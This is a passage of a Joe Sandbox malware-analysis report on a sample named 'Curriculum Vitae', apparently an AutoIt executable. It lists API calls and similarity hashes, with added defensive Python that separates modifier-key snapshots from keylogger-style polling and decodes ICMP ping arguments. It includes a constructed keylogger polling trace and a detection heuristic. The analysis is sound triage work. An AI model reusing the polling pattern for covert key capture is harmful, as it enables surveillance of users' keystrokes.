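                      The five virtual-key codes polled in the record above are all modifiers: 0xA0 VK_LSHIFT, 0xA1 VK_RSHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU (Alt) and 0x5B VK_LWIN, each read once with GetAsyncKeyState and once with GetKeyState after a GetKeyboardState snapshot. That is the shape of an input-synthesis routine checking which modifiers are physically held before it sends keystrokes (the AutoIt runtime strings @GUI_DRAGFILE, @GUI_DROPID and the DllCall conventions cdecl/stdcall/winapi in the neighbouring records place this module in the interpreter's built-ins), not the shape of a keylogger, which sweeps the printable range in a loop. The Python below is an added example, not code from the Joe Sandbox report, from Joe Security or from the sample: it parses API lines in the report's own "API.Module(arg), ref: addr" form, decodes the return bits of the two calls, and separates the two polling patterns. The second trace and the threshold of 16 printable keys are constructed for the demonstration.

```python
"""Tell a modifier-key snapshot apart from keylogger-style polling.

Added example; not code from the Joe Sandbox report, from Joe Security or
from the analysed sample. Trace lines are parsed in the report's own
"API.Module(arg), ref: addr" shape; the second trace and the threshold of
16 printable keys are constructed for the demonstration.
"""
import re
from collections import Counter

# Virtual-key codes from the Windows SDK (winuser.h).
VK_SHIFT, VK_CONTROL, VK_MENU = 0x10, 0x11, 0x12
VK_LWIN, VK_RWIN = 0x5B, 0x5C
VK_LSHIFT, VK_RSHIFT = 0xA0, 0xA1
VK_LCONTROL, VK_RCONTROL = 0xA2, 0xA3
VK_LMENU, VK_RMENU = 0xA4, 0xA5
MODIFIER_VKS = {VK_SHIFT, VK_CONTROL, VK_MENU, VK_LWIN, VK_RWIN,
                VK_LSHIFT, VK_RSHIFT, VK_LCONTROL, VK_RCONTROL, VK_LMENU, VK_RMENU}

# Return value semantics (SHORT, so the sign bit is bit 15):
#   GetAsyncKeyState: bit 15 = key is down right now, bit 0 = pressed since the last call.
#   GetKeyState:      bit 15 = key is down (per the message queue), bit 0 = toggle state.
def async_state(ret):
    ret &= 0xFFFF
    return {"down": bool(ret & 0x8000), "pressed_since_last": bool(ret & 0x0001)}

def sync_state(ret):
    ret &= 0xFFFF
    return {"down": bool(ret & 0x8000), "toggled": bool(ret & 0x0001)}

# One API line of the report, e.g. "• GetAsyncKeyState.USER32(000000A0), ref: 00D99D22".
LINE_RE = re.compile(
    r"^(?P<api>GetAsyncKeyState|GetKeyState)\.USER32\((?P<vk>[0-9A-Fa-f]{8})\), ref: (?P<ref>[0-9A-Fa-f]{8})$"
)

def parse_trace(text):
    """Return (api, vk, ref) tuples for the key-state calls in a trace."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = LINE_RE.match(line)
        if m:
            calls.append((m.group("api"), int(m.group("vk"), 16), m.group("ref")))
    return calls

def is_printable_vk(vk):
    # Digits/letters, numpad, and the OEM punctuation block.
    return 0x30 <= vk <= 0x5A or 0x60 <= vk <= 0x6F or 0xBA <= vk <= 0xDE

def classify(calls, printable_threshold=16):
    vks = {vk for _, vk, _ in calls}
    if not vks:
        return "no-key-polling"
    if vks <= MODIFIER_VKS:
        return "modifier-snapshot"      # what Send()-style input synthesis checks first
    if sum(1 for vk in vks if is_printable_vk(vk)) >= printable_threshold:
        return "keylogger-like"         # sweeping the printable range is what a polling logger does
    return "mixed"

def summarize(calls):
    """Count calls per API and list the distinct keys polled, for a triage note."""
    return {"per_api": dict(Counter(api for api, _, _ in calls)),
            "keys": sorted({vk for _, vk, _ in calls})}

# The eleven API lines from the record above, copied as-is.
REPORT_TRACE = """
• GetKeyboardState.USER32(?), ref: 00D99CA1
• GetAsyncKeyState.USER32(000000A0), ref: 00D99D22
• GetKeyState.USER32(000000A0), ref: 00D99D3D
• GetAsyncKeyState.USER32(000000A1), ref: 00D99D57
• GetKeyState.USER32(000000A1), ref: 00D99D6C
• GetAsyncKeyState.USER32(00000011), ref: 00D99D84
• GetKeyState.USER32(00000011), ref: 00D99D96
• GetAsyncKeyState.USER32(00000012), ref: 00D99DAE
• GetKeyState.USER32(00000012), ref: 00D99DC0
• GetAsyncKeyState.USER32(0000005B), ref: 00D99DD8
• GetKeyState.USER32(0000005B), ref: 00D99DEA
"""

# Constructed counter-example: a loop polling A..Z, the trace a polling keylogger leaves behind.
KEYLOGGER_TRACE = "\n".join(
    f"• GetAsyncKeyState.USER32({vk:08X}), ref: 00401{i:03X}"
    for i, vk in enumerate(range(0x41, 0x5B))
)

if __name__ == "__main__":
    for name, trace in (("report", REPORT_TRACE), ("constructed", KEYLOGGER_TRACE)):
        calls = parse_trace(trace)
        print(name, classify(calls), summarize(calls))
```

                      The classifier only reads which keys are polled; a real verdict should also look at whether the calls sit in a timer or message loop and whether anything is written to disk or sent out afterwards, which the static API list above does not show.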
                      APIs
                      • WSAStartup.WSOCK32(00000101,?), ref: 00DB05BC
                      • inet_addr.WSOCK32(?), ref: 00DB061C
                      • gethostbyname.WSOCK32(?), ref: 00DB0628
                      • IcmpCreateFile.IPHLPAPI ref: 00DB0636
                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DB06C6
                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DB06E5
                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00DB07B9
                      • WSACleanup.WSOCK32 ref: 00DB07BF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                      • String ID: Ping
                      • API String ID: 1028309954-2246546115
                      • Opcode ID: a95b401be60adcbb12776f747cc64e9024f7a8db7b8a8a881dc799b24cbc1c28
                      • Instruction ID: 81398724a8d9b8d1ecf3e533d9b3a5243b0c59d022fe1cf765793e19afbc0051
                      • Opcode Fuzzy Hash: a95b401be60adcbb12776f747cc64e9024f7a8db7b8a8a881dc799b24cbc1c28
                      • Instruction Fuzzy Hash: 4B914A75604302DFD720DF15C488F5ABBE4EF44318F1885A9E56A9B6A2CB30ED45CFA1
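                      Both IcmpSendEcho calls in the record above carry the literals RequestSize 0x5, ReplySize 0x29 and Timeout 0xFA0. Read against the icmpapi.h prototype IcmpSendEcho(IcmpHandle, DestinationAddress, RequestData, RequestSize, RequestOptions, ReplyBuffer, ReplySize, Timeout), ReplySize is exactly the documented minimum sizeof(ICMP_ECHO_REPLY) + RequestSize + 8 for a 32-bit build (28 + 5 + 8 = 41), and the 4000 ms timeout is the default of AutoIt's Ping() built-in, so this is the interpreter's ping routine (WSAStartup/gethostbyname resolve the host, IcmpCreateFile opens the handle, IcmpCloseHandle/WSACleanup tear it down). The Python below is an added example, not code from the Joe Sandbox report, from Joe Security or from the sample: it checks the report's arguments against that sizing rule and parses a reply buffer laid out the way IcmpSendEcho fills it. The reply bytes are constructed here rather than captured from the run, and the request content b"Ping\x00" is an assumption taken from the record's String ID.

```python
"""Decode the IcmpSendEcho arguments in the record above and parse a reply buffer.

Added example; not code from the Joe Sandbox report, from Joe Security or
from the sample. Structure layouts are the 32-bit ones from the Windows SDK
(ipexport.h / icmpapi.h); the reply bytes are constructed here, not captured
from the sandbox run, and the request content b"Ping\\x00" is an assumption
taken from the record's String ID.
"""
import struct
import ipaddress

# IcmpSendEcho(IcmpHandle, DestinationAddress, RequestData, RequestSize,
#              RequestOptions, ReplyBuffer, ReplySize, Timeout)
# Positional literals as printed by the report for this call site.
REPORT_ARGS = {"request_size": 0x00000005, "reply_size": 0x00000029, "timeout_ms": 0x00000FA0}

# 32-bit ICMP_ECHO_REPLY: Address, Status, RoundTripTime, DataSize, Reserved, Data*,
# then IP_OPTION_INFORMATION {Ttl, Tos, Flags, OptionsSize, OptionsData*}.
ICMP_ECHO_REPLY_FMT = "<IIIHHIBBBBI"
ICMP_ECHO_REPLY_SIZE = struct.calcsize(ICMP_ECHO_REPLY_FMT)   # 28 bytes on x86
ICMP_ERROR_SLACK = 8   # documented: ReplySize >= sizeof(ICMP_ECHO_REPLY) + RequestSize + 8

# Subset of the IP_STATUS codes from ipexport.h (IP_STATUS_BASE = 11000).
IP_STATUS_NAMES = {
    0: "IP_SUCCESS",
    11002: "IP_DEST_NET_UNREACHABLE",
    11003: "IP_DEST_HOST_UNREACHABLE",
    11010: "IP_REQ_TIMED_OUT",
    11013: "IP_TTL_EXPIRED_TRANSIT",
}

def min_reply_size(request_size):
    """Smallest ReplySize the API documentation allows for a given RequestSize."""
    return ICMP_ECHO_REPLY_SIZE + request_size + ICMP_ERROR_SLACK

def explain_report_args(args=REPORT_ARGS):
    """Check the report's literal arguments against the documented sizing rule."""
    return {
        "reply_size_is_minimum": args["reply_size"] == min_reply_size(args["request_size"]),
        "timeout_ms": args["timeout_ms"],
    }

def build_echo_reply(address, status, rtt_ms, data, ttl=128):
    """Construct a reply buffer the way IcmpSendEcho lays it out: header, then echoed data."""
    header = ipaddress.IPv4Address(address).packed + struct.pack(
        "<IIHHIBBBBI", status, rtt_ms, len(data), 0, 0, ttl, 0, 0, 0, 0)
    assert len(header) == ICMP_ECHO_REPLY_SIZE
    return header + data

def parse_echo_reply(buf):
    """Parse the first ICMP_ECHO_REPLY in a reply buffer; Data follows the struct in-buffer."""
    if len(buf) < ICMP_ECHO_REPLY_SIZE:
        raise ValueError(f"reply buffer too short: {len(buf)} < {ICMP_ECHO_REPLY_SIZE}")
    (_addr, status, rtt, data_size, _reserved, _data_ptr,
     ttl, tos, flags, _opt_size, _opt_ptr) = struct.unpack_from(ICMP_ECHO_REPLY_FMT, buf, 0)
    data = buf[ICMP_ECHO_REPLY_SIZE:ICMP_ECHO_REPLY_SIZE + data_size]
    if len(data) != data_size:
        raise ValueError("DataSize runs past the end of the buffer")
    return {
        "address": str(ipaddress.IPv4Address(buf[0:4])),   # IPAddr is stored in network order
        "status": IP_STATUS_NAMES.get(status, f"IP_STATUS_{status}"),
        "rtt_ms": rtt,
        "ttl": ttl,
        "tos": tos,
        "flags": flags,
        "data": data,
    }

if __name__ == "__main__":
    print(explain_report_args())
    reply = build_echo_reply("10.0.0.1", 0, 12, b"Ping\x00")   # constructed, fits the 0x29-byte buffer
    assert len(reply) <= REPORT_ARGS["reply_size"]
    print(parse_echo_reply(reply))
```

                      The same parser applies to a reply buffer dumped from the process after the call returns; the Status field is what distinguishes a reachable host from IP_REQ_TIMED_OUT, which is also how the interpreter decides between a round-trip time and an error return.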
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$BuffCharLower
                      • String ID: cdecl$none$stdcall$winapi
                      • API String ID: 707087890-567219261
                      • Opcode ID: 0ba17809400d966deff1636420f0951fb51e754ac9752ec179a6623801d5443f
                      • Instruction ID: 8f2760b2743e0e9d3581a7b8d5b5f0fb455067767ef3fa058553fbecbce023ea
                      • Opcode Fuzzy Hash: 0ba17809400d966deff1636420f0951fb51e754ac9752ec179a6623801d5443f
                      • Instruction Fuzzy Hash: A151AE31A04116DBCF14DF68C8509FEB3A9EF64324B25422AF866E7284DB31DD40DBB0
                      APIs
                      • CoInitialize.OLE32 ref: 00DB3774
                      • CoUninitialize.OLE32 ref: 00DB377F
                      • CoCreateInstance.OLE32(?,00000000,00000017,00DCFB78,?), ref: 00DB37D9
                      • IIDFromString.OLE32(?,?), ref: 00DB384C
                      • VariantInit.OLEAUT32(?), ref: 00DB38E4
                      • VariantClear.OLEAUT32(?), ref: 00DB3936
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                      • API String ID: 636576611-1287834457
                      • Opcode ID: 7120618e217051cc165ff37efc79e2b92a35f0a4154d9f1b8082b3d545b2a72d
                      • Instruction ID: 02867e30ad40ecfe8313bbd66b920426d934429b71b66d2590c58a874b3d0bb4
                      • Opcode Fuzzy Hash: 7120618e217051cc165ff37efc79e2b92a35f0a4154d9f1b8082b3d545b2a72d
                      • Instruction Fuzzy Hash: CB616A75608301EFD710DF54C888BAABBE8EF49710F144919F5869B291DB70EE48DBB2
                      APIs
                        • Part of subcall function 00D49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D49BB2
                        • Part of subcall function 00D4912D: GetCursorPos.USER32(?), ref: 00D49141
                        • Part of subcall function 00D4912D: ScreenToClient.USER32(00000000,?), ref: 00D4915E
                        • Part of subcall function 00D4912D: GetAsyncKeyState.USER32(00000001), ref: 00D49183
                        • Part of subcall function 00D4912D: GetAsyncKeyState.USER32(00000002), ref: 00D4919D
                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00DC8B6B
                      • ImageList_EndDrag.COMCTL32 ref: 00DC8B71
                      • ReleaseCapture.USER32 ref: 00DC8B77
                      • SetWindowTextW.USER32(?,00000000), ref: 00DC8C12
                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00DC8C25
                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00DC8CFF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                      • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#
                      • API String ID: 1924731296-655930031
                      • Opcode ID: a71887e6c8ab36437ee86c55f1dc16aff8a4ccd81d5cb9cb5d29bc5c5ad18300
                      • Instruction ID: 5e2c8d7af2cba2c5c3fb152413d8bb68a35827d49f21149625b434eebc5d3b66
                      • Opcode Fuzzy Hash: a71887e6c8ab36437ee86c55f1dc16aff8a4ccd81d5cb9cb5d29bc5c5ad18300
                      • Instruction Fuzzy Hash: CC516A70104305AFD704DF14D996FAA77E4FB88750F44062DFA96AB2E1CB719948CB72
                      APIs
                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00DA33CF
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00DA33F0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LoadString$_wcslen
                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                      • API String ID: 4099089115-3080491070
                      • Opcode ID: 26c03655b915787b413931d715cf4433aa1f2c3a0154a4ec2cd534200a916cde
                      • Instruction ID: 28b3ca5c62bf3bd38219a2f2e05d75b53faa416b4120fdb13ecdf7c59b8ded24
                      • Opcode Fuzzy Hash: 26c03655b915787b413931d715cf4433aa1f2c3a0154a4ec2cd534200a916cde
                      • Instruction Fuzzy Hash: FA51997290020AAADF15EBA4CE52EEEB379EF04340F148165F105720A2EB756F98CB70
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$BuffCharUpper
                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                      • API String ID: 1256254125-769500911
                      • Opcode ID: 151ca9c15bb614604d4e920aa9c5d8b17f3844e800b7db2f4461b3c3dfc5b2f3
                      • Instruction ID: 4683e82ad460f52ac2499b2a60a7053a70f6dd222e35c28f78a49b1357313d76
                      • Opcode Fuzzy Hash: 151ca9c15bb614604d4e920aa9c5d8b17f3844e800b7db2f4461b3c3dfc5b2f3
                      • Instruction Fuzzy Hash: FC41ED32A001279ACF106F7D9A905BE77A5EF60774B2A422BE561DF284E731DD81C770
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00DA53A0
                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DA5416
                      • GetLastError.KERNEL32 ref: 00DA5420
                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00DA54A7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Error$Mode$DiskFreeLastSpace
                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                      • API String ID: 4194297153-14809454
                      • Opcode ID: 56e4c9f8c4989ea7216a471a0db46cbd220d34b7171d456e3224d4d3bcf6628d
                      • Instruction ID: e69a0226517c1c6133b599cd4856b41a9b3df4df530e57b4d5e33aed6fe0d288
                      • Opcode Fuzzy Hash: 56e4c9f8c4989ea7216a471a0db46cbd220d34b7171d456e3224d4d3bcf6628d
                      • Instruction Fuzzy Hash: D531F435A006099FC710DF68D884EAEBBB4EF0A305F188065E506CB796D7B0DD82CBB1
                      APIs
                      • CreateMenu.USER32 ref: 00DC3C79
                      • SetMenu.USER32(?,00000000), ref: 00DC3C88
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DC3D10
                      • IsMenu.USER32(?), ref: 00DC3D24
                      • CreatePopupMenu.USER32 ref: 00DC3D2E
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DC3D5B
                      • DrawMenuBar.USER32 ref: 00DC3D63
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                      • String ID: 0$F
                      • API String ID: 161812096-3044882817
                      • Opcode ID: d2d6fe8ecf86d768dff47622ec483275762d4efa0e24b62e435151c00bca925e
                      • Instruction ID: 5731b5d61f78b0c363f4dd8283d11add5a0f39496a67a8ef3a98adbc469a43e8
                      • Opcode Fuzzy Hash: d2d6fe8ecf86d768dff47622ec483275762d4efa0e24b62e435151c00bca925e
                      • Instruction Fuzzy Hash: 8E415975A1130AAFDB14CF64D844FAA7BB5FF49350F18402CEA46A7360D731AA15CFA0
                      APIs
                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DC3A9D
                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DC3AA0
                      • GetWindowLongW.USER32(?,000000F0), ref: 00DC3AC7
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DC3AEA
                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DC3B62
                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00DC3BAC
                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00DC3BC7
                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00DC3BE2
                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00DC3BF6
                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00DC3C13
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$LongWindow
                      • String ID:
                      • API String ID: 312131281-0
                      • Opcode ID: 3d1eeee11549ad869f5651fa13bc10203b20790b9d481f97f9515e6d69a1df22
                      • Instruction ID: 3c106dd66d32eacd6463fe82d50da75a0a6258e9dca70f4e0f5931b3da97f6f3
                      • Opcode Fuzzy Hash: 3d1eeee11549ad869f5651fa13bc10203b20790b9d481f97f9515e6d69a1df22
                      • Instruction Fuzzy Hash: 87617B75900209AFDB10DFA8CD81FEE77B8EB49700F144199FA15EB2A1D770AE85DB60
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00D9B151
                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00D9A1E1,?,00000001), ref: 00D9B165
                      • GetWindowThreadProcessId.USER32(00000000), ref: 00D9B16C
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D9A1E1,?,00000001), ref: 00D9B17B
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D9B18D
                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00D9A1E1,?,00000001), ref: 00D9B1A6
                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D9A1E1,?,00000001), ref: 00D9B1B8
                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00D9A1E1,?,00000001), ref: 00D9B1FD
                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00D9A1E1,?,00000001), ref: 00D9B212
                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00D9A1E1,?,00000001), ref: 00D9B21D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                      • String ID:
                      • API String ID: 2156557900-0
                      • Opcode ID: 2cfb7dc4d31beff60f4b741b35c331da35f4874b3cfb9999e8f7d4670265e96d
                      • Instruction ID: 6574b5f55a76ececb1ff8b9cef0bc9ff88d3036b63b9801096d3d45b5fcf9a39
                      • Opcode Fuzzy Hash: 2cfb7dc4d31beff60f4b741b35c331da35f4874b3cfb9999e8f7d4670265e96d
                      • Instruction Fuzzy Hash: 8731CE71650305AFDF109FA5EE48F6D7BAEEB10321F155006FA04E62A0C7B0AA858F34
                      APIs
                      • _free.LIBCMT ref: 00D62C94
                        • Part of subcall function 00D629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000), ref: 00D629DE
                        • Part of subcall function 00D629C8: GetLastError.KERNEL32(00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000,00000000), ref: 00D629F0
                      • _free.LIBCMT ref: 00D62CA0
                      • _free.LIBCMT ref: 00D62CAB
                      • _free.LIBCMT ref: 00D62CB6
                      • _free.LIBCMT ref: 00D62CC1
                      • _free.LIBCMT ref: 00D62CCC
                      • _free.LIBCMT ref: 00D62CD7
                      • _free.LIBCMT ref: 00D62CE2
                      • _free.LIBCMT ref: 00D62CED
                      • _free.LIBCMT ref: 00D62CFB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
